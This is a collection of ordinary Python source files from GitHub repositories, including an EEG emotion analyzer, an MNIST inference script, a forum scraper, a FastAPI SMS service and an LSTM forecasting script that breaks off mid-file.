analyze_eeg.py: Core module that analyzes the eeg with time steps \"\"\"\n\n__author__ = \"Isaac Sim\"\n__copyright__ = \"Copyright 2019, The Realtime EEG Analysis Project\"\n__credits__ = [\"Isaac Sim\"]\n__license__ = \"\"\n__version__ = \"1.0.0\"\n__maintainer__ = [\"Isaac Sim\", \"Dongjoon Jeon\"]\n__email__ = \"gilgarad@igsinc.co.kr\"\n__status__ = \"Development\"\n\nfrom os.path import join\nimport numpy as np\n\nfrom keras.models import model_from_json, Model\nimport keras.backend.tensorflow_backend as K\n\nfrom neural_network.nn_models.fft_convention import FFTConvention\nfrom neural_network.utils.custom_function import ScoreActivationFromSigmoid, GetCountNonZero, GetPadMask\nfrom utils.similarity import Similarity\nfrom datetime import datetime\nfrom collections import Counter\n\nfrom typing import Type\n\nclass AnalyzeEEG:\n def __init__(self, path: str):\n \"\"\" Initialize the core module that analyzes EEG\n\n :param path:\n \"\"\"\n self.path = path\n self.fft_conv = None\n self.models = list()\n\n self.num_frame_check = 16\n self.sampling_rate = 128\n self.realtime_eeg_in_second = 3 # Realtime each ... seconds\n self.number_of_channel = 14\n self.count = 0\n\n self.eeg_seq_length = self.sampling_rate * self.realtime_eeg_in_second\n self.max_seq_length = self.sampling_rate * 60 * 5 #\n self.num_of_average = int(self.sampling_rate / self.num_frame_check)\n self.arousal_all = [2.0] * self.num_of_average\n self.valence_all = [2.0] * self.num_of_average\n self.fun_status = [0] * self.num_of_average\n self.immersion_status = [0] * self.num_of_average\n self.difficulty_status = [0] * self.num_of_average\n self.emotion_status = [0] * self.num_of_average\n\n self.eeg_realtime = np.zeros((self.number_of_channel, self.max_seq_length), dtype=np.float)\n # self.eeg_realtime = self.eeg_realtime.T.tolist()\n # print('Length:', len(self.eeg_realtime))\n self.fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n self.final_score_pred = np.zeros((4, 1))\n self.seq_pos = 0\n\n self.fun_accum = 0\n self.immersion_accum = 0\n self.difficulty_accum = 0\n self.emotion_accum = 0\n\n self.fun_records = list()\n self.immersion_records = list()\n self.difficulty_records = list()\n self.emotion_records = list()\n\n self.record_start_time = 0\n self.record_duration = 0\n\n self.record_status = False\n\n # Status dictionary (will be removed once the regression model is fully applied)\n self.fun_stat_dict = { 0: '일반', 1: '재미있음' }\n self.immersion_stat_dict = { 0: '일반', 1: '몰입됨' }\n self.difficulty_stat_dict = { 0: '쉬움', 1: '어려움' }\n self.emotion_stat_dict = { 0: '즐거움', 1: '일반', 2: '짜증' }\n\n def load_models(self, model_names: str):\n \"\"\" Load models that will be used in analysis process\n\n :param model_names:\n :return:\n \"\"\"\n # TODO\n # currently 2 models for short term prediction, one for final prediction for the given model_names\n\n # Arousal Valence\n self.fft_conv = FFTConvention(path=self.path)\n\n # Load Saved Model\n for idx, (model, weight) in enumerate(model_names):\n with open(join(self.path, model), 'r') as f:\n loaded_model_json = f.read()\n\n if idx != 2:\n custom_objects = {}\n\n losses = {'amusement': 'categorical_crossentropy',\n 'immersion': 'categorical_crossentropy',\n 'difficulty': 'categorical_crossentropy',\n 'emotion': 'categorical_crossentropy'}\n\n else:\n custom_objects = {\n 'ScoreActivationFromSigmoid': ScoreActivationFromSigmoid,\n 'GetPadMask': GetPadMask, 'GetCountNonZero': GetCountNonZero}\n\n losses = {'amusement': 'mean_squared_error',\n 'immersion': 'mean_squared_error',\n 'difficulty': 'mean_squared_error',\n 'emotion': 'mean_squared_error'}\n\n with K.tf.device('/cpu:0'):\n loaded_model = model_from_json(loaded_model_json, custom_objects=custom_objects)\n loaded_model.load_weights(join(self.path, weight))\n loss_weights = {'amusement': 1.0, 'immersion': 1.0, 'difficulty': 1.0, 'emotion': 1.0}\n loaded_model.compile(loss=losses, loss_weights=loss_weights, optimizer='adam', metrics=['accuracy'])\n self.models.append(loaded_model)\n\n # print('Model Object at initial', self.model)\n\n def set_record_status(self, analyze_status: int):\n \"\"\" By the external command (like UI), set the record status to start and or stop record the EEG\n and its analysis data\n\n :param analyze_status:\n :return:\n \"\"\"\n if analyze_status == 1 and not self.record_status:\n self.record_start_time = datetime.now()\n self.record_status = True\n elif analyze_status == 2 and self.record_status:\n self.record_status = False\n self.analyze_final_prediction()\n elif analyze_status == 3: # reset all recorded data\n self.emotion_records = list()\n self.fun_records = list()\n self.difficulty_records = list()\n self.immersion_records = list()\n self.record_start_time = 0\n self.record_duration = 0\n self.fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n self.seq_pos = 0\n self.final_score_pred = np.zeros((4, 1))\n\n def store_eeg_rawdata(self, eeg_rawdata: list):\n \"\"\" Stores the new rawdata to the matrix that holds the data a certain period of time.\n\n :param eeg_rawdata:\n :return:\n \"\"\"\n\n new_data = eeg_rawdata[3: 3 + self.number_of_channel]\n self.eeg_realtime = np.insert(self.eeg_realtime, self.max_seq_length, new_data, axis=1)\n self.eeg_realtime = np.delete(self.eeg_realtime, 0, axis=1)\n self.count += 1\n\n def build_middle_layer_pred(self, model: Type[Model]):\n \"\"\" Function to get the middle-layer prediction of the model\n\n :param model:\n :return:\n \"\"\"\n show_layers = [13, 14, 15, 16, 33, 34, 35, 36] # 0 ~ 36 (13~16step scores, 33~34 final scores)\n layers_outputs = list()\n for i in range(1, 37):\n if i in show_layers:\n layers_outputs.append(model.layers[i].output)\n\n middle_layer_output = K.function([model.layers[0].input],\n layers_outputs)\n\n return middle_layer_output\n\n def analyze_eeg_data(self, all_channel_data: np.ndarray):\n \"\"\" Process all data from EEG data to predict.\n Currently four labels (Amusement, Immersion, Difficulty, Emotion). NOT USED FOR NOW\n\n :param all_channel_data:\n :return:\n \"\"\"\n \"\"\" \n \n Input: Channel data with dimension N x M. N denotes number of channel and M denotes number of EEG data from each channel.\n Output: Class of emotion between 1 to 5 according to Russel's Circumplex Model. And send it to web ap\n \"\"\"\n\n # Get feature from EEG data\n feature = self.fft_conv.get_feature(all_channel_data)\n # only ten features retrieved from frequency form\n feature_basic = feature.reshape((14, 18))\n feature_basic = feature_basic[:, :10]\n feature_basic = feature_basic.ravel()\n\n # Emotion Prediction by Nadzeri's source\n class_ar = Similarity.compute_similarity(feature=feature_basic, all_features=self.fft_conv.train_arousal,\n label_all=self.fft_conv.class_arousal[0])\n class_va = Similarity.compute_similarity(feature=feature_basic, all_features=self.fft_conv.train_valence,\n label_all=self.fft_conv.class_valence[0])\n emotion_class = self.fft_conv.determine_emotion_class(class_ar, class_va)\n\n x_test = feature_basic.reshape(1, 14, 10, 1)\n\n ratio = [0.5, 0.5, 0.5]\n y_pred = None\n for idx, model in enumerate(self.models):\n if idx == 2:\n # print('Middle Layer pred', datetime.now())\n _x_test = feature_basic.reshape(1, 1, 140)\n fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n fft_seq_data = np.insert(fft_seq_data, 0, _x_test, axis=1)\n fft_seq_data = np.delete(fft_seq_data, 300, axis=1)\n _y_pred = model.predict([fft_seq_data])\n # print(idx, _y_pred)\n # break\n else:\n continue\n # _y_pred = model.predict(x=x_test, batch_size=1)\n # print(idx, _y_pred)\n #\n # if y_pred is None: # first\n # y_pred = list()\n # for y_elem in _y_pred:\n # y_pred.append(ratio[idx] * y_elem)\n # else: # sum\n # new_pred = list()\n # for y_elem, _y_elem in zip(y_pred, _y_pred):\n # y_elem_sum = np.sum([y_elem, ratio[idx] * _y_elem], axis=0)\n # new_pred.append(y_elem_sum)\n # y_pred = new_pred\n #\n # fun = np.argmax(y_pred[0], axis=1)[0] # Fun Prediction\n # difficulty = np.argmax(y_pred[1], axis=1)[0] # Difficulty Prediction\n # immersion = np.argmax(y_pred[2], axis=1)[0] # Immersion Prediction\n # emotion = np.argmax(y_pred[3], axis=1)[0] # Emotion Prediction\n\n fun = _y_pred[0][0][0]\n difficulty = _y_pred[1][0][0]\n immersion = _y_pred[2][0][0]\n emotion = _y_pred[3][0][0]\n # print(fun, difficulty, immersion, emotion)\n # print('')\n\n return emotion_class, class_ar, class_va, fun, difficulty, immersion, emotion, feature_basic\n\n def analyze_final_prediction(self):\n \"\"\" Make a final prediction for entire data in sequence from record start to record end\n\n :return:\n \"\"\"\n model = self.models[2] # [TEMP]\n # layers_outputs = list()\n # for i in range(1, 38):\n # layers_outputs.append(model.layers[i].output)\n #\n # get_3rd_layer_output = K.function([model.layers[0].input],\n # layers_outputs)\n #\n # _layer_output = get_3rd_layer_output([eeg_data])\n # for i in range(0, 37): # 0 ~ 36 (13~16step scores, 33~34 final scores)\n # layer_output = _layer_output[i]\n # print(layer_output)\n # print(len(layer_output[0]))\n # print('')\n\n _y_pred = model.predict([self.fft_seq_data])\n # print('analyze_final_prediction:', _y_pred)\n # print(len(np.where(np.sum(self.fft_seq_data, axis=2) ==0)[1]))\n self.final_score_pred = _y_pred\n return _y_pred\n\n def analyze_and_evaluate_moment(self):\n \"\"\" Analyze and predict the moment of three seconds window size.\n\n :return:\n \"\"\"\n # eeg_realtime = np.array(self.eeg_realtime).T\n eeg_realtime = self.eeg_realtime\n # Analyze\n emotion_class, class_ar, class_va, fun, difficulty, immersion, emotion, feature_basic = \\\n self.analyze_eeg_data(eeg_realtime[:, -self.eeg_seq_length:])\n\n # stat_code\n if fun >= 6:\n fun_stat_code = 1\n else:\n fun_stat_code = 0\n\n if immersion >= 5:\n immersion_stat_code = 1\n else:\n immersion_stat_code = 0\n\n if difficulty >= 5:\n difficulty_stat_code = 1\n else:\n difficulty_stat_code = 0\n\n if emotion > 6:\n emotion_stat_code = 0\n elif emotion >= 4:\n emotion_stat_code = 1\n else:\n emotion_stat_code = 2\n\n # print(fun_stat_code, immersion_stat_code, difficulty_stat_code, emotion_stat_code)\n\n # Last calculation for moment analysis\n if self.count == self.sampling_rate:\n # print('Sampling Rate:', self.count)\n emotion_dict = {\n 1: \"fear - nervous - stress - tense - upset\",\n 2: \"happy - alert - excited - elated\",\n 3: \"relax - calm - serene - contented\",\n 4: \"sad - depressed - lethargic - fatigue\",\n 5: \"neutral\"\n }\n class_ar = np.round(np.mean(self.arousal_all))\n class_va = np.round(np.mean(self.valence_all))\n\n # emotion_class = self.fft_conv.determine_emotion_class(class_ar, class_va)\n\n if self.record_status:\n self.fun_records.append(fun_stat_code)\n self.immersion_records.append(immersion_stat_code)\n self.difficulty_records.append(difficulty_stat_code)\n self.emotion_records.append(emotion_stat_code)\n self.record_duration = (datetime.now() - self.record_start_time).seconds\n x_test = feature_basic.reshape(1, 1, 140)\n if self.seq_pos == 300:\n self.fft_seq_data = np.insert(self.fft_seq_data, self.seq_pos, x_test, axis=1)\n self.fft_seq_data = np.delete(self.fft_seq_data, 0, axis=1)\n else:\n self.fft_seq_data = np.insert(self.fft_seq_data, self.seq_pos, x_test, axis=1)\n self.fft_seq_data = np.delete(self.fft_seq_data, 300, axis=1)\n self.seq_pos += 1\n\n self.count = 0\n\n if len(self.valence_all) == self.num_of_average:\n self.valence_all.pop(0)\n self.arousal_all.pop(0)\n self.fun_status.pop(0)\n self.difficulty_status.pop(0)\n self.immersion_status.pop(0)\n self.emotion_status.pop(0)\n\n # Analyze result sum\n self.arousal_all.append(class_ar)\n self.valence_all.append(class_va)\n self.fun_status.append(fun)\n self.difficulty_status.append(difficulty)\n self.immersion_status.append(immersion)\n self.emotion_status.append(emotion)\n\n\n\n # draw graph\n d = {\n 'eeg_realtime': eeg_realtime[:, self.max_seq_length - 1],\n 'arousal_all': np.array(self.arousal_all),\n 'valence_all': np.array(self.valence_all),\n # 'fun_stat': self.fun_stat_dict[self.final_fun],\n # 'immersion_stat': self.immersion_stat_dict[self.final_immersion],\n # 'difficulty_stat': self.difficulty_stat_dict[self.final_difficulty],\n # 'emotion_stat': self.emotion_stat_dict[self.final_emotion],\n 'fun_stat': self.fun_stat_dict[fun_stat_code],\n 'immersion_stat': self.immersion_stat_dict[immersion_stat_code],\n 'difficulty_stat': self.difficulty_stat_dict[difficulty_stat_code],\n 'emotion_stat': self.emotion_stat_dict[emotion_stat_code],\n 'fun_stat_record': self.counter(self.fun_records, self.fun_stat_dict),\n 'immersion_stat_record': self.counter(self.immersion_records, self.immersion_stat_dict),\n 'difficulty_stat_record': self.counter(self.difficulty_records, self.difficulty_stat_dict),\n 'emotion_stat_record': self.counter(self.emotion_records, self.emotion_stat_dict),\n 'record_duration': self.record_duration,\n 'fun_status': self.fun_status,\n 'immersion_status': self.immersion_status,\n 'difficulty_status': self.difficulty_status,\n 'emotion_status': self.emotion_status,\n 'final_score_pred': self.final_score_pred\n }\n\n return d\n\n def most_common(self, target_list: list, last_status: int):\n \"\"\" Find most common\n\n :param target_list:\n :param last_status:\n :return:\n \"\"\"\n a = Counter(target_list).most_common(2)\n final_status = int(a[0][0])\n if len(a) != 1 and a[0][1] == a[1][1]:\n if int(a[0][0]) == last_status or int(a[1][0]) == last_status:\n final_status = last_status\n return final_status\n\n def counter(self, data: list, data_dict: dict):\n \"\"\" Counts the duplicate elements\n\n :param data:\n :param data_dict:\n :return:\n \"\"\"\n counter_dict = dict()\n data = [str(d) for d in data]\n data = Counter(data)\n for k, v in data_dict.items():\n counter_dict[v] = data[str(k)]\n\n return counter_dict\n","repo_name":"gilgarad/realtime_eeg_analyzer","sub_path":"realtime_eeg/analyze_eeg.py","file_name":"analyze_eeg.py","file_ext":"py","file_size_in_byte":16631,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"10915882082","text":"import sys, os\nsys.path.append(os.pardir)\n\nfrom dataset.mnist import load_mnist\n\n# (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)\n\n# print(x_train.shape)\n# print(t_train.shape)\n# print(x_test.shape)\n# print(t_test.shape)\n\nimport numpy as np\n\n# 이미지 확인하기\n# from PIL import Image\n\n# def img_show(img):\n# pil_img = Image.fromarray(np.uint8(img))\n# pil_img.show()\n\n# img = x_train[0]\n# label = t_train[0]\n# print(label)\n\n# print(img.shape)\n# img = img.reshape(28, 28)\n# print(img.shape)\n\n# img_show(img)\n\n\nimport pickle\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n# softmax function - improve over flow \ndef softmax(a):\n c = np.max(a)\n exp_a = np.exp(a - c)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, flatten=True, one_hot_label=False)\n return x_test, t_test\n\ndef init_network():\n with open(\"sample_weight.pkl\", 'rb') as f:\n network = pickle.load(f)\n \n return network\n\ndef predict(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\nx, t = get_data()\nnetwork = init_network()\n\nbatch_size = 100 # batch size\naccuracy_cnt = 0\n# for i in range(len(x)):\nfor i in range(0, len(x), batch_size):\n x_batch = x[i:i+batch_size] # i'th ~ i+batch_size'th\n y_batch = predict(network, x_batch)\n p = np.argmax(y_batch, axis = 1)\n accuracy_cnt += np.sum(p == t[i:i+batch_size])\n\n # y = predict(network, x[i])\n # p = np.argmax(y)\n # if p == t[i]:\n # accuracy_cnt += 1\n \nprint(\"Accuracy:\" + str(float(accuracy_cnt) / len(x)))\n","repo_name":"stainblue/DeepLearning_study","sub_path":"DeepLearning_from_Scratch/03_Neural_Network/use_mnist.py","file_name":"use_mnist.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71399397686","text":"from nio.modules.context import ModuleContext\nfrom nio.testing.modules.settings import Settings\nfrom nio.modules.settings.module import SettingsModule\n\n\nclass TestingSettingsModule(SettingsModule):\n\n def initialize(self, context):\n super().initialize(context)\n if not context.in_service:\n self.proxy_settings_class(Settings)\n else:\n # Don't proxy Settings, we want NotImplementedError to be raised\n # inside the service process\n pass\n\n def finalize(self):\n super().finalize()\n\n def prepare_core_context(self):\n context = ModuleContext()\n context.in_service = False\n return context\n\n def prepare_service_context(self, service_context=None):\n context = ModuleContext()\n context.in_service = True\n return context\n","repo_name":"niolabs/nio","sub_path":"nio/testing/modules/settings/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"24420096340","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\n\n\nclass ApiClient(object):\n def __init__(self, baseURL, endpointURL, params):\n self.baseURL = baseURL\n self.endpointUrl = endpointURL\n self.params = params\n\n def _url(self, query):\n url = (self.baseURL + self.endpointUrl).format(str(query))\n print('URL: ' + url)\n return url\n\n def make_request(self, body=None):\n if self.params['method'] == 'GET':\n print('-----------------')\n print(self.params)\n return requests.get(self._url(self.params['query']))\n\n if self.params['method'] == 'POST':\n return requests.get(self._url(self.params['query']), json=body)\n\n\ndef sentiments(endpoint, text):\n sent_url = 'https://octak.herokuapp.com/'\n endpoint_rulz = endpoint + '?text={:s}'\n\n params = {\n 'method' : 'GET',\n 'query' : text\n }\n\n response = ApiClient(sent_url, endpoint_rulz, params).make_request()\n\n if response.status_code == 200:\n return response.json()\n else:\n return [{}]\n\n\n\n\ndef check_source(title):\n news_search_url = 'http://spnl-news-search.apphb.com/'\n news_search_endpoint = 'api/News/searchnews?query={:s}'\n\n params = {\n 'method' : 'GET',\n 'query' : title\n }\n\n response = ApiClient(news_search_url, news_search_endpoint, params).make_request()\n\n if response.status_code == 200:\n return response.json()\n else:\n return [{}]\n","repo_name":"calincrist/weak_signals","sub_path":"spln/LocalModules/ApiClientModule/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4085412565","text":"from __future__ import annotations\n\nimport inspect\nfrom typing import (\n Any,\n Callable,\n Generic,\n Optional,\n Protocol,\n TypeVar,\n cast,\n runtime_checkable,\n)\n\nfrom marimo._utils.format_signature import format_signature\n\n_WRAP_WIDTH = 72\n\n\ndef _format_parameter(parameter: inspect.Parameter) -> str:\n annotation = (\n \"\"\n if parameter.annotation == inspect.Parameter.empty\n else \": \" + cast(str, parameter.annotation)\n )\n default = (\n \"\"\n if parameter.default == inspect.Parameter.empty\n else f\" = '{str(parameter.default)}'\"\n if isinstance(parameter.default, str)\n else f\" = {str(parameter.default)}\"\n )\n return parameter.name + annotation + default\n\n\ndef _get_signature(obj: Any) -> str:\n name = cast(str, obj.__name__)\n try:\n signature = inspect.signature(obj)\n except Exception:\n # classes with fancy metaclasses, like TypedDict, can throw\n # an exception\n return name + \": \" + str(type(obj))\n\n parameters = \", \".join(\n [\n _format_parameter(parameter)\n for parameter in signature.parameters.values()\n ]\n )\n if inspect.isclass(obj):\n signature_text = name + \"(\" + parameters + \")\"\n return format_signature(\"class \", signature_text, width=_WRAP_WIDTH)\n else:\n return_annotation = (\n \" -> \" + signature.return_annotation\n if (\n signature.return_annotation != inspect.Signature.empty\n and signature.return_annotation\n )\n else \"\"\n ) + \":\"\n signature_text = (\n name + \"(\" + parameters + \")\" + cast(str, return_annotation)\n )\n return format_signature(\"def \", signature_text, width=_WRAP_WIDTH)\n\n\ndef _doc_with_signature(obj: Any) -> str:\n \"\"\"Return docstring with its signature prepended.\"\"\"\n signature = \"```python\\n\" + _get_signature(obj) + \"\\n```\"\n return (\n signature + \"\\n\\n\" + inspect.cleandoc(cast(str, obj.__doc__))\n if obj.__doc__ is not None\n else signature\n )\n\n\nT = TypeVar(\"T\", bound=Callable[..., Any])\n\n\n@runtime_checkable\nclass RichHelp(Protocol, Generic[T]):\n \"\"\"Protocol to provide a class or function docstring formatted as markdown.\n\n Implement the protocol by implementing a `_rich_help_` static method, which\n should render a Markdown string documenting the class. For example:\n\n ```python3\n class MyClass:\n \\\"\\\"\\\"**MyClass.**\n\n A class implementing the `RichHelp` protocol.\n \\\"\\\"\\\"\n\n @staticmethod\n def _rich_help_() -> Optional[str]:\n return MyClass.__doc__\n ```\n \"\"\"\n\n @staticmethod\n def _rich_help_() -> Optional[str]:\n return _doc_with_signature(RichHelp)\n\n __call__: T\n\n\ndef mddoc(obj: T) -> T:\n \"\"\"Adds a `_rich_help_` method to the passed in object.\n\n Returns `obj`, with modification to implement the `RichHelp` protocol.\n \"\"\"\n rich_help = cast(RichHelp[T], obj)\n rich_help._rich_help_ = lambda: _doc_with_signature( # type: ignore[method-assign] # noqa: E501\n obj\n )\n # cast back to original type, so type-hinters provide helpful information\n return cast(T, rich_help)\n","repo_name":"marimo-team/marimo","sub_path":"marimo/_output/rich_help.py","file_name":"rich_help.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":521,"dataset":"github-code","pt":"76"} +{"seq_id":"4146160904","text":"from bs4 import BeautifulSoup\nimport requests\nfrom datetime import date\nimport csv\nreq=requests.get(\"https://www.nairaland.com/#featured\").text\nsoup=BeautifulSoup(req, 'lxml' )\ntr=soup.find(\"td\",class_=\"featured w\")\ntodays_date=date.today()\ncurrent_month=todays_date.strftime(\"%b\")\ncurrent_day=todays_date.strftime(\"%d\")\ncsv_file=open(\"/storage/emulated/0/my_website_scrape.csv\",\"w\")\ncsv_writer=csv.writer(csv_file)\ncsv_writer.writerow([\"username\",\"post_header\",\"section\",\"day_posted\",\"month_posted\",\"time_posted\"])\nfor a_tag in tr.find_all(\"a\"):\n\t\n\tlink=a_tag.get(\"href\")\n\t\n\tindividual_post_requests=requests.get(link).text\n\tpost_soup=BeautifulSoup(individual_post_requests,\"lxml\")\n\ttime_date_span_list=post_soup.find(\"span\",class_=\"s\").text.split(\" On \")\n\ttime=time_date_span_list[0]\n\t#posts that were created today do not show month and day so i have to assign it to todays date if it was created today\n\ttry:\n\t\tmonth_day_list=time_date_span_list[1].split(\" \")\n\texcept IndexError:\n\t\tmonth_day_list=[current_month,current_day]\n\tmonth=month_day_list[0]\n\tday=month_day_list[1]\n\theader_with_section_as_list=post_soup.find(\"h2\").text.split(\" - \")\n\theader=header_with_section_as_list[0]\n\tsection=header_with_section_as_list[1]\n\n\tuser=post_soup.find(\"a\",class_=\"user\").text\n\tprint(user)\n\tprint(header)\n\tprint(section)\n\tprint(day)\n\tprint(month)\n\tprint(time)\n\tcsv_writer.writerow([user,header,section,day,month,time])\n\ncsv_file.close()","repo_name":"saheedniyi02/website-scrape","sub_path":"beautiful 😍😍.py","file_name":"beautiful 😍😍.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28326659599","text":"from fastapi import FastAPI\n# from functools import lru_cache\nimport logging\nimport requests\nimport json\nfrom serializer import BytesEncoder\nfrom ui import frontend\nfrom worker.router import router as worker_router\nfrom helpers import generate_sms_destinations, generate_sms_payload\nfrom configs.csets import settings\nfrom configs.clog import LOGGER\nfrom worker.service import consume_all\nimport asyncio\n\napp = FastAPI()\napp.include_router(frontend.router)\napp.include_router(worker_router)\n\n@app.get(\"/\")\nasync def root():\n return {\"server\": \"I'm alive\"}\n\n@app.get('/ping')\ndef index_request():\n return {\"message\": \"pong\"}\n\n@app.get('/health_check')\ndef index_request():\n return {\n \"message\": \"healthy\"\n }\n\nURL = settings.wg_url\nphone_nums = settings.test_phone_nums\n\n@app.get('/push_multiple')\nasync def multiple_request(num: int):\n destinations = generate_sms_destinations(phone_nums, num)\n json_destinations = json.dumps(destinations)\n # print(json_destinations)\n LOGGER.info(json_destinations)\n\n msg = 'Sorry to bother you, this is a test broadcast message. After reading this throw your phone away'\n msg = msg.encode('utf-8')\n payload = generate_sms_payload(msg, destinations)\n \n try:\n headers={'Content-Type': 'application/json'}\n response = requests.post(URL, data=json.dumps(payload, cls=BytesEncoder), headers=headers)\n json_response = response.json()\n # print(json_response)\n LOGGER.info(json_response)\n if response.status_code == 200:\n return {\n \"success\": True,\n \"message\": \"Messages sent\",\n \"result\": json_response,\n }\n \n except Exception as ex:\n LOGGER.error(ex)\n return {\n \"success\": False,\n \"message\": str(ex),\n }\n \n return {\n \"success\": False,\n \"message\": \"Messages could not be sent\",\n }\n\n@app.on_event(\"startup\")\nasync def startup_event():\n try:\n await consume_all()\n LOGGER.info('App Events started successful')\n pass\n except Exception as e:\n # print('App Events startup error', str(e))\n LOGGER.info('App Events startup error')\n LOGGER.info(str(e))\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n try:\n # unsubscribe\n LOGGER.info('App Events shutdown successful')\n pass\n except Exception as e:\n # print('App Events shutdown error', str(e))\n ev_loop = asyncio.get_event_loop()\n ev_loop.stop()\n ev_loop.close()\n LOGGER.info('App Events shutdown error')\n LOGGER.info(str(e))\n\n","repo_name":"cephydex/fastapi-kafka-single-topic","sub_path":"consumer1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20994822433","text":"import os\nimport sys\n\nimport numpy\nimport pandas\nimport matplotlib.pyplot as plt\n\nfrom keras.layers import Dense, LSTM\nfrom keras.models import Sequential\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom tqdm import trange\n\n\n# For reproducibility\n# numpy.random.seed(10)\n\n\ndef load_dataset(filename: str) -> (numpy.ndarray, MinMaxScaler):\n\n \"\"\"\n The functions focuses on loading the dataset and then normalising the\n loaded data\n\n :paramaters \n - filename: filename of the file to load\n\n :return:\n - a dataset as a tuple \n - the MinMaxScaler object to be used\n \"\"\"\n\n # Loads the datasource passed in into a dataframe\n dataframe = pandas.read_csv(filename, usecols=[1])\n dataframe = dataframe.fillna(method='pad')\n\n # Transforms data frame into a working dataset of float\n dataset = dataframe.values\n dataset = dataset.astype('float32')\n\n # Proceeds to then normalize the dataset\n mmscale = MinMaxScaler(feature_range=(0, 1))\n dataset = mmscale.fit_transform(dataset)\n\n return dataset, mmscale\n\ndef split_dataset(dataset: numpy.ndarray, training_size, look_back) -> (numpy.ndarray, numpy.ndarray):\n\n \"\"\"\n Splits dataset into training and test datasets. The last `look_back` rows in train dataset\n will be used as `look_back` for the test dataset.\n\n :parameters \n - dataset: the original dataset\n - training_size: specifies the size to be used for the training data\n - look_back: The number of previous time steps\n\n :return\n - tuple of x for training or test dataset\n - tuple of y for training or test dataset\n \"\"\"\n\n if not training_size > look_back:\n raise ValueError('training_size must be larger than the look_back size')\n\n train, test = dataset[0:training_size, :], dataset[training_size - look_back:len(dataset), :]\n #print('train_dataset: {}, test_dataset: {}'.format(len(train), len(test)))\n\n return train, test\n\n\ndef create_dataset(dataset: numpy.ndarray, look_back: int=1) -> (numpy.ndarray, numpy.ndarray):\n\n \"\"\"\n This function uses the dataset and the look back (number of previous steps as input variables), \n which calculates the next time period. \n\n :parameter:\n - dataset: the dataset\n - look_back: number of previous steps as input variables (Int)\n\n :return: \n - tuple creating input and output set\n \"\"\"\n data_x, data_y = [], []\n\n # Append the dataset\n for i in range(len(dataset)-look_back-1):\n a = dataset[i:(i+look_back), 0]\n data_x.append(a)\n data_y.append(dataset[i + look_back, 0])\n\n return numpy.array(data_x), numpy.array(data_y)\n\n\n\ndef build_model(look_back: int, batch_size: int=1) -> Sequential:\n\n \"\"\"\n The function builds a keras Sequential model\n\n :parameters\n - look_back: The number of previous time steps\n - batch_size: The batch size to use\n\n :return: \n - A Sequential Model object for Keras\n \"\"\"\n model = Sequential()\n model.add(LSTM(64,\n activation='relu',\n batch_input_shape=(batch_size, look_back, 1),\n stateful=True,\n return_sequences=False))\n model.add(Dense(1, activation='linear'))\n model.compile(loss='mean_squared_error', optimizer='adam')\n return model\n\n\ndef generate_forecast(model: Sequential, look_back_buffer: numpy.ndarray, timesteps: int=1, batch_size: int=1):\n\n \"\"\"\n The function generates the final prediction forecase\n\n :parameter \n - model: A Sequential Model object for Keras\n - look_back_buffer: The buffer containing the look back values\n - timesteps: The timestep to use (default 1)\n - batch_size: The batch size to use (default 1)\n\n :return: \n - The forecast prediction\n \"\"\"\n\n forecast_predict = numpy.empty((0, 1), dtype=numpy.float32)\n\n for _ in trange(timesteps, desc='predicting data\\t', mininterval=1.0):\n\n # Use the lookback buffer in order to make a prediciton\n cur_predict = model.predict(look_back_buffer, batch_size)\n\n # Sum the predicition and the result\n forecast_predict = numpy.concatenate([forecast_predict, cur_predict], axis=0)\n\n # Reshape using new axis\n cur_predict = numpy.reshape(cur_predict, (cur_predict.shape[1], cur_predict.shape[0], 1))\n\n # Eliminate the oldest prediction from the buffer\n look_back_buffer = numpy.delete(look_back_buffer, 0, axis=1)\n\n # The the buffer and concatenate it with the latest prediciton\n look_back_buffer = numpy.concatenate([look_back_buffer, cur_predict], axis=1)\n\n return forecast_predict\n\ndef plot_data(dataset: numpy.ndarray, look_back: int, training_prediction: numpy.ndarray,\n test_predict: numpy.ndarray, forecast_predict: numpy.ndarray):\n\n \"\"\"\n Plots the dataset line and the prediction line\n\n\n :paramaters \n - dataset: the original dataset used\n - look_back: the amount of previous time steps\n - training_prediction: the predicted values from the training\n - test_predict: the predicted values from the testing\n - forecast_predict: prediction based on all previous predictions\n \"\"\"\n axes = plt.gca()\n\n # Sets the axis title\n if sys.argv[2] == \"1\":\n plt.title('Predicted Marks Average for Student')\n plt.ylabel('Student Mark')\n else:\n plt.title('Predicted Marks Average for Module')\n plt.ylabel('Average Student Marks')\n\n # Set the ticks for the y axis and remove x ticks\n axes.set_ylim([0,100])\n plt.yticks([10, 